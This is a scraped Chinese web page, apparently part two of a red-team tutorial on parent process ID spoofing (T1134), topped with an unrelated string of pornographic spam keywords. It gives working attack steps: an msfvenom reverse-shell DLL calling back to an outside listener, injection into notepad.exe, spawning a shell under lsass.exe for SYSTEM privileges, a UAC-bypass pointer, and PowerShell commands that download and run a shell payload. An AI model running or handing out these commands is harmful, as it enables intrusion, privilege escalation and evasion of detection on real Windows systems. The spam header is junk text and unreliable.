人妻丝袜美腿中文字幕乱一区三区-天天爽夜夜爽夜夜爽-摸 透 干 奶 流 操 逼-中文字幕一区二区色婷婷-免费特黄一级欧美大片在线看-91久久福利国产成人精品-久久精品人人爽人人做97-亚洲深喉一区二区在线看片-久久中文字幕无码不卡

  1. 首頁 > 經(jīng)驗知識 > >

T1134 紅隊技術(shù)-父進(jìn)程欺騙( 二 )

生活經(jīng)驗紅隊

在受感染端,使用tasklist /v查看進(jìn)程運行詳情 。

T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
在列表中,可以看到explorer.exe進(jìn)程以test身份在進(jìn)程ID 1624上運行 。
然后運行生成的shell.exe,并附屬在explorer.exe的PID下
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖


T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
監(jiān)聽端收到的shell便是explorer.exe進(jìn)程用戶的權(quán)限
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
如果利用具有system權(quán)限的進(jìn)程,即可進(jìn)行提權(quán) 。
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖


T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
方法二(使用Powershell DLL注入進(jìn)行PID欺騙)
【T1134 紅隊技術(shù)-父進(jìn)程欺騙】F-Secure 實驗室利用 powershell 創(chuàng)建了替代上述Didier 二進(jìn)制文件的方案 。它也可以用于父進(jìn)程欺騙,與上述方法不同之處在于,可以將帶有注入的DLL的子進(jìn)程派生為子進(jìn)程,功能更強大 。代碼可以在這里下載***/countercept/ppid-spoofing,首先在受害者機器上查看進(jìn)程ID,這里我們選擇 Powershell 的 PID 24092 作為父進(jìn)程ID 。
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
利用msfvenmon生成要注入的DLL
msfvenom -p windows/x64/shell_reverse_tcp exitfunc=thread LHOST=172.27.115.207 LPORT=7777 -f dll > shell.dll[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x64 from the payloadNo encoder specified, outputting raw payloadPayload size: 460 bytesFinal size of dll file: 8704 bytes然后進(jìn)行注入:
Import-Module .\PPID-Spoof.ps1PPID-Spoof -ppid 24092 -spawnto "C:\Windows\System32\notepad.exe" -dllpath .\shell.dll
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
可以看到注入的DLL在Notepad.exe中加載執(zhí)行了 。
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
通過這種方式,PPID 24092上的powershell.exe進(jìn)程派生了一個帶有插入代碼(由DLL提供)的notepad.exe 。
方法三(使用Powershell 腳本入進(jìn)行PID欺騙)
Decoder-it 根據(jù) Didier Stevens 提供的指南開發(fā)了一個 powershell 腳本,使用了 CreateProcessFromParent() 方法,可以在此處找到的psgetsystem腳本:***/decoder-it/psgetsystem.git,可用于通過PID欺騙派生子進(jìn)程 。首先我們查看所需進(jìn)程的 PID 。這里以lsass.exe為例
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
然后執(zhí)行如下命令:
powershell -ep bypassImport-Module .\psgetsys.ps1[MyProcess]::CreateProcessFromParent(520,".\shell.exe","")
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
如果報錯,可能是UAC的問題,需要先繞過UAC,或者是權(quán)限過低,需要提權(quán) 。
繞過UAC腳本可以在這里找到:***/samratashok/nishang/tree/master/Escalation
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
然后下載所需的文件,然后執(zhí)行命令
$client=new-object System.Net.WebClient $client.DownloadFile("http://<url>/psgetsys.ps1",".\psgetsys.ps1")$client.DownloadFile("http://<url>/shell.exe",".\shell.exe")Import-Module .\psgetsys.ps1[MyProcess]::CreateProcessFromParent(520,".\shell.exe","")

推薦閱讀